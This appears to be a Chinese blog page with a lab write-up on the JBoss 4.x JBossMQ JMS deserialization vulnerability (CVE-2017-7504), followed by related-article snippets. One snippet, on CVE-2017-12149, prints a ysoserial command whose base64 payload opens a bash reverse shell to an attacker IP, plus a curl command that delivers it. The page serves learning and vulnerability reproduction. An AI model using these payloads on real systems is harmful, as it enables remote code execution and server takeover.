JBoss 4.x JBossMQ JMS反序列化漏洞分析溯源

最新推荐文章于 2024-12-17 11:01:14 发布
原创 最新推荐文章于 2024-12-17 11:01:14 发布 · 1.3k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#jboss #反序列化

本文深入分析了JBoss4.x及之前版本中的JMSoverHTTPInvocationLayer反序列化漏洞,探讨其成因及利用方式。通过实例演示,展示了如何复现此漏洞并执行任意代码,包括利用exp进行攻击及在本地搭建环境测试。

墨者学院

WEB安全

JBoss 4.x JBossMQ JMS反序列化漏洞分析溯源

漏洞成因

Red Hat JBoss Application Server 是一款基于JaveEE 的开源应用服务器,JBoss AS 4.x 及之前的版本中,JBoss实现过程的JMS over HTTP Invocation Layer 的HTTPserverLSeverILServlet.java文件存在反序列化漏洞,远程攻击者可以借助特质的序列化数据利用该漏洞执行任意代码

序列化:在java中,java会将代码中的对象转换为字符串传输,也方便了保存在文件,数据库中。而反序列化就是他的逆过程,由字节流还原成对象,Java的ObjectOutputStream 类中的writeObject()方法可以实现序列化,ObjectInputStream类的readObject()方法可是用于反序列化。而出现反序列化漏洞的原因就是ObjectInputStream在反序列化时,没有对生成的对象类型做限制。

漏洞复现

在这里插入图片描述

可以明显看到这是JBoss的框架

接下来下载exp 利用exp

使用方式:

javac -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap.java
java -cp .:commons-collections-3.2.1.jar

最低0.47元/天 解锁文章
(CVE-2017-7504JBoss 4.x JBossMQ JMS 反序列化漏洞
weixin_45253622的博客
12-09 820
JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504) vulhub官方复现:https://vulhub.org/#/environments/jboss/CVE-2017-7504/ 漏洞描述:Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。JBoss AS 4.x及之前版本中,JbossMQ 实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java
漏洞复现】JBoss 4.x JBossMQ JMS反序列化
Fly_鹏程万里
01-22 461
JBoss AS 4.x及之前版本的JbossMQ实现过程中,JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可构造序列化数据利用该漏洞来执行任意代码并获取服务器端的权限。
JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504
weixin_47493074的博客
09-24 396
JBoss 4.x JBossMQ JMS 反序列化漏洞
墨者JBoss 4.x JBossMQ JMS反序列化漏洞
m0_63283172的博客
03-16 311
墨者JBoss 4.x JBossMQ JMS反序列化漏洞
360众测靶场题库之51-JBoss 4.x JBossMQ JMS反序列化漏洞分析溯源
zjl12344的博客
03-09 255
360众测靶场题库
漏洞复现—Jboss反序列化漏洞利用CVE-2017-12149/CVE-2017-7504
weixin_45556536的博客
11-12 1023
Jboss反序列化漏洞利用CVE-2017-12149/CVE-2017-7504基础知识漏洞原理影响版本复现思路复现—CVE-2017-121491、特征检测2、反弹shell复现—CVE-2017-75041、特征检测2、反弹shell 基础知识   序列化就是把对象转换成字节流,便于保存在内存、文件、数据库中;反序列化即逆过程,由字节流还原成对象。   Java中的ObjectOutputStream类的writeObject()方法可以实现序列化,ObjectInputStream类的readObj
vulhub中JBoss 4.x JBossMQ JMS 反序列化漏洞复现(CVE-2017-7504
yougexiaojiuguan的博客
03-03 418
漏洞复现过程中的记录
网安漏洞复现系列:漏洞复现之JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504
weixin_54626591的博客
05-06 481
漏洞复现之JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504
jboss反序列化漏洞检测工具
02-15
jboss中间件的反序列化漏洞检测工具,可检测主机搭建的中间件并获得shell
JBOSS反序列化漏洞工具
03-28
通过JBOSS4 commons-collections.jar包的反序列化类InvokerTransformer, InstantiateFactory 和 InstantiateTransfromer class 文件可以远程操控服务器
JBoss漏洞反序列化漏洞
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
11-09 432
JBoss 4.x JBossMQ JMS反序列化漏洞(CVE-2017-7504) 适用范围: Jboss AS 4.x及之前版本 JBoss漏洞环境: Vulhub - Docker-Compose file for vulnerability environment JBoss漏洞验证: 访问/jbossmq-httpil/HTTPServerILServlet,出现以下页面代表存在漏洞
JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504)--vulhub
ccc_9wy的博客
12-17 750
CVE-2017-7504反序列化漏洞jboss 4.x;JBoss AS 4.x;JBoss 4.x JBossMQ JMS 反序列化漏洞复现;vulhub靶场复现。
JBossMQJMS 反序列化漏洞(CVE-2017-7504
懂进攻知防守
07-23 1469
CVE-2017-7504 漏洞与 CVE-2015-7501 的漏洞原理相似,只是利用的路径稍微出现了变化, CVE-2017-7504 出现在 /jbossmq-httpil/HTTPServerILServlet 路径下。JBoss AS 4.x及之前版本中,JbossMQ实现过程的 JMS over HTTP Invocation Layer 的HTTPServerILServlet.java ⽂件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利⽤该漏洞执⾏任意代码。...
JBoss 4.x JBossMQ JMS 反序列化漏洞复现(CVE-2017-7504)
wutiangui的博客
09-11 494
访问/jbossmq-httpil/HTTPServerILServlet,出现以下页面代表存在漏洞。执行完该命令之后,会在本地桌面生成一个序列化的文件exp.ser,并利用cat查看其内容。然后,将生成的exp复制到JavaDeserH2HC-master目录方便下一步利用。使用工具ysoserial.jar生成序列化数据。Jboss AS 4.x及之前版本。使用序列化数据反弹shell。
JBoss反序列化
weixin_41438728的博客
11-16 2398
这里写目录标题基础知识原理CVE-2017-12149CVE-2017-7504验证复现思路复现-CVE-2017-12149复现-CVE-2017-7504 基础知识 序列化就是把对象转换成字节流,便于保存在内存、文件、数据库中;反序列化即逆过程,由字节流还原成对象。 Java中的ObjectOutputStream类的writeObject()方法可以实现序列化,ObjectInputStream类的readObject()方法用于反序列化。 形成漏洞的根源在于类ObjectInputStream在反序
JBoss 5.x/6.x 反序列化漏洞(CVE-2017-12149)危害
最新发布
08-22
### 漏洞概述 CVE-2017-12149 是一个影响 JBoss Application Server (AS) 5.x 和 6.x 版本的严重安全漏洞。此漏洞源于 JBoss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器在处理客户端发送的数据时,未能进行必要的安全检查,直接对数据流进行了反序列化操作。这种不当的处理方式使得攻击者能够通过发送特制的恶意序列化数据来触发远程命令执行,进而可能完全控制受影响的服务器[^1]。 ### 安全危害 #### 远程代码执行 最直接且严重的后果是,攻击者可以利用此漏洞在目标系统上执行任意代码。这意味着攻击者可以安装恶意软件、窃取敏感信息、修改或删除数据等,对企业的信息安全构成极大威胁[^2]。 #### 内网渗透 由于 JBoss 通常部署在企业内部网络中,此漏洞的存在不仅允许攻击者从外部网络入侵,还可能成为攻击者进一步渗透内网的跳板。一旦攻击者获得了内网中某一台服务器的控制权,他们可以通过这台服务器作为跳板,尝试攻击其他内部系统[^3]。 #### 数据泄露 攻击者利用此漏洞成功入侵后,可以访问存储在服务器上的所有数据,包括但不限于客户信息、交易记录、商业秘密等。这些数据的泄露不仅会对企业造成经济损失,还可能损害企业的声誉和客户信任[^4]。 ### 影响范围 此漏洞影响 JBoss AS 5.x 和 6.x 版本,这两个版本曾广泛应用于各种规模的企业中,尤其是在金融、电信等行业。因此,该漏洞的影响范围非常广泛,任何未及时更新或采取其他缓解措施的组织都可能受到攻击[^5]。 ### 缓解措施 为了减轻此漏洞带来的风险,建议采取以下措施: - **升级软件**:最直接有效的解决方法是将 JBoss 升级至不受此漏洞影响的新版本。 - **限制访问**:对于无法立即升级的系统,可以通过配置防火墙规则,限制对 HttpInvoker 组件的访问,仅允许信任的IP地址访问。 - **监控与审计**:加强系统的监控和日志审计,以便及时发现并响应任何可疑活动。 ### 示例代码 以下是一个使用 `ysoserial` 工具生成恶意序列化数据的示例命令,该数据可用于测试环境中的漏洞复现: ```bash java -jar ysoserial.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE1OS4xMjgvMTkxMTEgMD4mMQ==}|{base64,-d}|{bash,-i}" > exp.ser ``` 随后,攻击者可以通过 `curl` 命令将生成的 `exp.ser` 文件发送到目标服务器上的 `/invoker/readonly` 路径: ```bash curl http://192.168.159.129:8080/invoker/readonly --data-binary @exp.ser ``` 以上命令假设攻击者的机器正在监听指定的端口,以接收反弹的 shell 连接。 ###
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值